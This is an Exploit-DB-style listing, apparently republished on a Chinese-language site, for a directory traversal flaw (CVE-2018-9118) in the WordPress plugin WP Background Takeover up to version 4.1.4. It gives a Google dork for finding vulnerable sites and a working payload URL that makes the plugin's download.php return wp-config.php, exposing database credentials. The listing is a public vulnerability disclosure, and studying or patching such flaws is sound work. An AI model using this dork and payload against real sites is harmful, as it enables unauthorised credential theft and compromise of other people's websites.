WordPress Plugin Background Takeover < 4.1.4 - Directory Traversal

  • 作者: Colette Chamberland
    日期: 2018-04-09
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/44417/
  • # Exploit Title: WP Background Takeover, Directory Traversal <= 4.1.4
# Google Dork: inurl:/plugins/wpsite-background-takeover
# Date: 2018-03-08
# Exploit Author: Colette Chamberland, Defiant, Inc.
# Vendor Homepage: https://99robots.com
# Software Link: https://99robots.com/products/wp-background-takeover-advertisements/
# Version: <= 4.1.4
# Tested on: WordPress 4.9.x
# CVE : CVE-2018-9118

Description

Allows for an attacker to browse files via the download.php file:

http://target[.]com/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php